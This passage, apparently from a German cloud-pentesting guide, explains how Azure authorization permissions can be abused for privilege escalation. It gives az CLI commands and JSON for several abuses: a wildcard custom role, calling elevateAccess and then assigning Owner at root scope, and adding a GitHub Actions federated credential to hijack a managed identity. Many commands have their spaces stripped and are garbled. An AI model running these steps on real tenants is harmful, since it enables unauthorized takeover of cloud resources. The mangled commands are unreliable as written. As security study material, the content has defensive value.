Diese Berechtigung erlaubt es, Rollen an Prinzipale über einen bestimmten Geltungsbereich zuzuweisen, was einem Angreifer ermöglicht, Privilegien zu eskalieren, indem er sich selbst eine privilegiertere Rolle zuweist:
Diese Berechtigung ermöglicht es, die von einer Rolle gewährten Berechtigungen zu ändern, wodurch ein Angreifer die Privilegien erhöhen kann, indem er einer zugewiesenen Rolle weitere Berechtigungen gewährt.
Erstellen Sie die Datei role.json mit dem folgenden Inhalt:
{"Name":"<name of the role>","IsCustom":true,"Description":"Custom role with elevated privileges","Actions": ["*"],"NotActions": [],"DataActions": ["*"],"NotDataActions": [],"AssignableScopes": ["/subscriptions/<subscription-id>"]}
Dann aktualisieren Sie die Rollenberechtigungen mit der vorherigen Definition, indem Sie aufrufen:
azroledefinitionupdate--role-definitionrole.json
Microsoft.Authorization/elevateAccess/action
Diese Berechtigung ermöglicht es, Privilegien zu erhöhen und Berechtigungen für beliebige Prinzipale zu Azure-Ressourcen zuzuweisen. Sie ist dafür gedacht, Entra ID Global Administratoren zugewiesen zu werden, damit sie auch Berechtigungen für Azure-Ressourcen verwalten können.
Ich denke, der Benutzer muss Global Administrator in Entra ID sein, damit der Erhöhungsaufruf funktioniert.
# Call elevateazrest--methodPOST--uri"https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"# Grant a user the Owner roleazroleassignmentcreate--assignee"<obeject-id>"--role"Owner"--scope"/"
Diese Berechtigung ermöglicht das Hinzufügen von federierten Anmeldeinformationen zu verwalteten Identitäten. Z. B. Zugriff auf Github Actions in einem Repo für eine verwaltete Identität gewähren. Dann ermöglicht es den Zugriff auf jede benutzerdefinierte verwaltete Identität.
Beispielbefehl, um einer verwalteten Identität Zugriff auf ein Repo in Github zu gewähren:
# Generic example:azrest--methodPUT \--uri "https://management.azure.com//subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \--headers "Content-Type=application/json" \--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'# Example with specific data:azrest--methodPUT \--uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \--headers "Content-Type=application/json" \--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'
